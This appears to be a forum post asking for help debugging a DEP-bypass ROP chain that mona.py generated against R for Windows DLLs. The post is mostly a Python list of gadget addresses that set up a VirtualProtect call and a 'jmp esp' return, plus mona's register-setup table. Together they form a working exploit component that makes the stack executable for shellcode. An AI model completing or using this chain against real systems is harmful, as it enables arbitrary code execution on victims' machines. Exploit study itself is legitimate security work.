I am dealing with rop chains from mona , but at the moment I want to execute it. this fails without reason ,but I want to know how can I fix it ? I am strugling at the moment of creating / fixing my rop chain
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x6c998dce, # POP EAX # RETN [R.dll]
0x643cb170, # ptr to &VirtualProtect() [IAT Riconv.dll]
0x6cb95ca5, # MOV EAX,DWORD PTR DS:[EAX] # RETN [R.dll]
0x6ca5755d, # XCHG EAX,ESI # RETN [R.dll]
0x6fef9d29, # POP EBP # RETN [grDevices.dll]
0x6ca599c7, # & jmp esp [R.dll]
0x6cbebfa6, # POP EAX # RETN [R.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x6c0e1c4a, # NEG EAX # RETN [Rlapack.dll]
0x63742597, # XCHG EAX,EBX # RETN [Rgraphapp.dll]
0x6e7d4eb8, # POP ECX # RETN [utils.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x71364d80, # NEG ECX # RETN [stats.dll]
0x6ca29048, # MOV EDX,ECX # POP ESI # RETN [R.dll]
0x41414141, # Filler (compensate)
0x64c45cb8, # POP ECX # RETN [methods.dll]
0x713bb594, # &Writable location [stats.dll]
0x6c9803dc, # POP EDI # RETN [R.dll]
0x6375fe5c, # RETN (ROP NOP) [Rgraphapp.dll]
0x6c998dce, # POP EAX # RETN [R.dll]
0x90909090, # nop
0x6feb834a, # PUSHAD # RETN [grDevices.dll]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
I also mona give me this
Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualProtect()
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lPAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------